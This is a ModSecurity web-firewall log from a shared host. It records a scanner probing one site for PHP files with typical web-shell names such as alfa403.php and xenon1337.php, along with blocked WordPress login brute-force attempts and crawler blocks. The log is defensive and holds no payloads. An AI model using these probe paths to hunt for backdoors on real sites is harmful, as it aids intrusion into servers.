[Tue May 26 19:01:21.221867 2026] [security2:error] [pid 1045635:tid 1045877] [client 20.151.130.61:19447] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWgqRhDcQXYr7SS5sUVTwAAAHA"]
[Tue May 26 19:01:21.412924 2026] [security2:error] [pid 1045635:tid 1045805] [client 20.151.130.61:19411] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWgqRhDcQXYr7SS5sUVVgAAACg"]
[Tue May 26 19:01:21.413118 2026] [security2:error] [pid 1045635:tid 1045805] [client 20.151.130.61:19411] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWgqRhDcQXYr7SS5sUVVgAAACg"]
[Tue May 26 19:01:21.436721 2026] [security2:error] [pid 1045635:tid 1045881] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgqRhDcQXYr7SS5sUVSAAAAHQ"]
[Tue May 26 19:01:21.727419 2026] [security2:error] [pid 1045635:tid 1045824] [client 20.151.130.61:38376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWgqRhDcQXYr7SS5sUVYgAAADs"]
[Tue May 26 19:01:21.727524 2026] [security2:error] [pid 1045635:tid 1045824] [client 20.151.130.61:38376] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWgqRhDcQXYr7SS5sUVYgAAADs"]
[Tue May 26 19:01:21.992935 2026] [security2:error] [pid 1045635:tid 1045869] [client 20.151.130.61:19422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWgqRhDcQXYr7SS5sUVawAAAGg"]
[Tue May 26 19:01:21.993038 2026] [security2:error] [pid 1045635:tid 1045869] [client 20.151.130.61:19422] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWgqRhDcQXYr7SS5sUVawAAAGg"]
[Tue May 26 19:01:22.581240 2026] [security2:error] [pid 1045635:tid 1045815] [client 20.151.130.61:19645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWgqhhDcQXYr7SS5sUVegAAADI"]
[Tue May 26 19:01:22.581372 2026] [security2:error] [pid 1045635:tid 1045815] [client 20.151.130.61:19645] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWgqhhDcQXYr7SS5sUVegAAADI"]
[Tue May 26 19:01:22.917802 2026] [security2:error] [pid 1045635:tid 1045818] [client 20.151.130.61:31309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWgqhhDcQXYr7SS5sUVhAAAADU"]
[Tue May 26 19:01:22.917917 2026] [security2:error] [pid 1045635:tid 1045818] [client 20.151.130.61:31309] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWgqhhDcQXYr7SS5sUVhAAAADU"]
[Tue May 26 19:01:23.124991 2026] [security2:error] [pid 1045635:tid 1045881] [client 20.151.130.61:31356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWgqxhDcQXYr7SS5sUViAAAAHQ"]
[Tue May 26 19:01:23.125104 2026] [security2:error] [pid 1045635:tid 1045881] [client 20.151.130.61:31356] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWgqxhDcQXYr7SS5sUViAAAAHQ"]
[Tue May 26 19:01:23.387005 2026] [security2:error] [pid 1045635:tid 1045890] [client 20.151.130.61:31329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWgqxhDcQXYr7SS5sUVkAAAAH0"]
[Tue May 26 19:01:23.387092 2026] [security2:error] [pid 1045635:tid 1045890] [client 20.151.130.61:31329] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWgqxhDcQXYr7SS5sUVkAAAAH0"]
[Tue May 26 19:01:23.658609 2026] [security2:error] [pid 1045635:tid 1045776] [client 20.151.130.61:38391] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWgqxhDcQXYr7SS5sUVoQAAAAs"]
[Tue May 26 19:01:23.658788 2026] [security2:error] [pid 1045635:tid 1045776] [client 20.151.130.61:38391] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWgqxhDcQXYr7SS5sUVoQAAAAs"]
[Tue May 26 19:01:23.700188 2026] [security2:error] [pid 1045635:tid 1045874] [client 51.159.154.219:46436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.154.159.51.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahWgqxhDcQXYr7SS5sUVoAAAAG0"]
[Tue May 26 19:01:23.888443 2026] [security2:error] [pid 1045635:tid 1045824] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgqxhDcQXYr7SS5sUVkwAAADs"]
[Tue May 26 19:01:23.949461 2026] [security2:error] [pid 1045635:tid 1045770] [client 20.151.130.61:19406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWgqxhDcQXYr7SS5sUVpQAAAAU"]
[Tue May 26 19:01:23.949546 2026] [security2:error] [pid 1045635:tid 1045770] [client 20.151.130.61:19406] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWgqxhDcQXYr7SS5sUVpQAAAAU"]
[Tue May 26 19:01:24.601160 2026] [security2:error] [pid 1045635:tid 1045839] [client 185.191.171.17:43130] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-1st/list/"] [unique_id "ahWgrBhDcQXYr7SS5sUVwQAAAEo"]
[Tue May 26 19:01:24.601384 2026] [security2:error] [pid 1045635:tid 1045839] [client 185.191.171.17:43130] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-1st/list/"] [unique_id "ahWgrBhDcQXYr7SS5sUVwQAAAEo"]
[Tue May 26 19:01:24.621068 2026] [security2:error] [pid 1045635:tid 1045860] [client 20.151.130.61:19622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWgrBhDcQXYr7SS5sUVwgAAAF8"]
[Tue May 26 19:01:24.621202 2026] [security2:error] [pid 1045635:tid 1045860] [client 20.151.130.61:19622] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWgrBhDcQXYr7SS5sUVwgAAAF8"]
[Tue May 26 19:01:25.071910 2026] [security2:error] [pid 1045635:tid 1045811] [client 20.151.130.61:19443] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahWgrRhDcQXYr7SS5sUVzgAAAC4"]
[Tue May 26 19:01:25.303608 2026] [security2:error] [pid 1045635:tid 1045720] [remote 103.11.102.106:54172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWgrRhDcQXYr7SS5sUV0wAAUFQ"]
[Tue May 26 19:01:25.453804 2026] [security2:error] [pid 1045635:tid 1045848] [client 20.151.130.61:19593] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgrRhDcQXYr7SS5sUV4AAAAFM"]
[Tue May 26 19:01:25.529455 2026] [security2:error] [pid 1045635:tid 1045814] [client 20.151.130.61:19443] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-admin/js/"] [unique_id "ahWgrRhDcQXYr7SS5sUV4QAAADE"]
[Tue May 26 19:01:25.622999 2026] [security2:error] [pid 1045635:tid 1045874] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgrRhDcQXYr7SS5sUV2QAAAG0"]
[Tue May 26 19:01:25.624684 2026] [security2:error] [pid 1045635:tid 1045841] [client 20.151.130.61:19593] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgrRhDcQXYr7SS5sUV5QAAAEw"]
[Tue May 26 19:01:25.712694 2026] [security2:error] [pid 1045635:tid 1045722] [remote 208.109.188.137:60136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWgrRhDcQXYr7SS5sUV6QAAIlY"], referer: https://kurgu-afrika.com/wp-login.php
[Tue May 26 19:01:25.714710 2026] [security2:error] [pid 1045635:tid 1045817] [client 20.151.130.61:19443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWgrRhDcQXYr7SS5sUV6gAAADQ"]
[Tue May 26 19:01:25.714782 2026] [security2:error] [pid 1045635:tid 1045817] [client 20.151.130.61:19443] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWgrRhDcQXYr7SS5sUV6gAAADQ"]
[Tue May 26 19:01:26.033361 2026] [security2:error] [pid 1045635:tid 1045831] [client 20.151.130.61:38350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWgrhhDcQXYr7SS5sUV9QAAAEI"]
[Tue May 26 19:01:26.033458 2026] [security2:error] [pid 1045635:tid 1045831] [client 20.151.130.61:38350] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWgrhhDcQXYr7SS5sUV9QAAAEI"]
[Tue May 26 19:01:26.482773 2026] [security2:error] [pid 1045635:tid 1045771] [client 20.151.130.61:31307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWgrhhDcQXYr7SS5sUV_wAAAAY"]
[Tue May 26 19:01:26.482896 2026] [security2:error] [pid 1045635:tid 1045771] [client 20.151.130.61:31307] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWgrhhDcQXYr7SS5sUV_wAAAAY"]
[Tue May 26 19:01:26.827482 2026] [security2:error] [pid 1045635:tid 1045885] [client 20.151.130.61:19624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWgrhhDcQXYr7SS5sUWDgAAAHg"]
[Tue May 26 19:01:26.827591 2026] [security2:error] [pid 1045635:tid 1045885] [client 20.151.130.61:19624] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWgrhhDcQXYr7SS5sUWDgAAAHg"]
[Tue May 26 19:01:27.286674 2026] [security2:error] [pid 1045635:tid 1045847] [client 20.151.130.61:38382] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wordpress/wp-admin/maint/"] [unique_id "ahWgrxhDcQXYr7SS5sUWGAAAAFI"]
[Tue May 26 19:01:27.492460 2026] [security2:error] [pid 1045635:tid 1045790] [client 20.151.130.61:19593] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgrxhDcQXYr7SS5sUWGwAAABk"]
[Tue May 26 19:01:27.563135 2026] [security2:error] [pid 1045635:tid 1045875] [client 20.151.130.61:38382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWgrxhDcQXYr7SS5sUWHwAAAG4"]
[Tue May 26 19:01:27.563238 2026] [security2:error] [pid 1045635:tid 1045875] [client 20.151.130.61:38382] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWgrxhDcQXYr7SS5sUWHwAAAG4"]
[Tue May 26 19:01:27.950875 2026] [security2:error] [pid 1045635:tid 1045866] [client 20.151.130.61:31345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWgrxhDcQXYr7SS5sUWIwAAAGU"]
[Tue May 26 19:01:27.950970 2026] [security2:error] [pid 1045635:tid 1045866] [client 20.151.130.61:31345] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWgrxhDcQXYr7SS5sUWIwAAAGU"]
[Tue May 26 19:01:28.391152 2026] [security2:error] [pid 1045635:tid 1045854] [client 20.151.130.61:57776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWgsBhDcQXYr7SS5sUWLQAAAFk"]
[Tue May 26 19:01:28.391365 2026] [security2:error] [pid 1045635:tid 1045854] [client 20.151.130.61:57776] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWgsBhDcQXYr7SS5sUWLQAAAFk"]
[Tue May 26 19:01:28.430858 2026] [security2:error] [pid 1045635:tid 1045830] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgsBhDcQXYr7SS5sUWJgAAAEE"]
[Tue May 26 19:01:28.766021 2026] [security2:error] [pid 1045635:tid 1045779] [client 20.151.130.61:19408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahWgsBhDcQXYr7SS5sUWNQAAAA4"]
[Tue May 26 19:01:28.766130 2026] [security2:error] [pid 1045635:tid 1045779] [client 20.151.130.61:19408] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahWgsBhDcQXYr7SS5sUWNQAAAA4"]
[Tue May 26 19:01:29.007923 2026] [security2:error] [pid 1045635:tid 1045788] [client 20.151.130.61:65180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahWgsRhDcQXYr7SS5sUWPAAAABc"]
[Tue May 26 19:01:29.008065 2026] [security2:error] [pid 1045635:tid 1045788] [client 20.151.130.61:65180] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahWgsRhDcQXYr7SS5sUWPAAAABc"]
[Tue May 26 19:01:29.207357 2026] [security2:error] [pid 1045635:tid 1045797] [client 20.151.130.61:19455] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-admin/css/"] [unique_id "ahWgsRhDcQXYr7SS5sUWQgAAACA"]
[Tue May 26 19:01:29.281328 2026] [security2:error] [pid 1045635:tid 1045801] [client 20.151.130.61:19593] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgsRhDcQXYr7SS5sUWSQAAACQ"]
[Tue May 26 19:01:29.353974 2026] [security2:error] [pid 1045635:tid 1045816] [client 20.151.130.61:19455] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/x/"] [unique_id "ahWgsRhDcQXYr7SS5sUWSgAAADM"]
[Tue May 26 19:01:29.426991 2026] [security2:error] [pid 1045635:tid 1045864] [client 20.151.130.61:19593] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgsRhDcQXYr7SS5sUWTgAAAGM"]
[Tue May 26 19:01:29.499996 2026] [security2:error] [pid 1045635:tid 1045784] [client 20.151.130.61:19455] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/modern/"] [unique_id "ahWgsRhDcQXYr7SS5sUWUgAAABM"]
[Tue May 26 19:01:29.597067 2026] [security2:error] [pid 1045635:tid 1045827] [client 20.151.130.61:19593] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgsRhDcQXYr7SS5sUWVgAAAD4"]
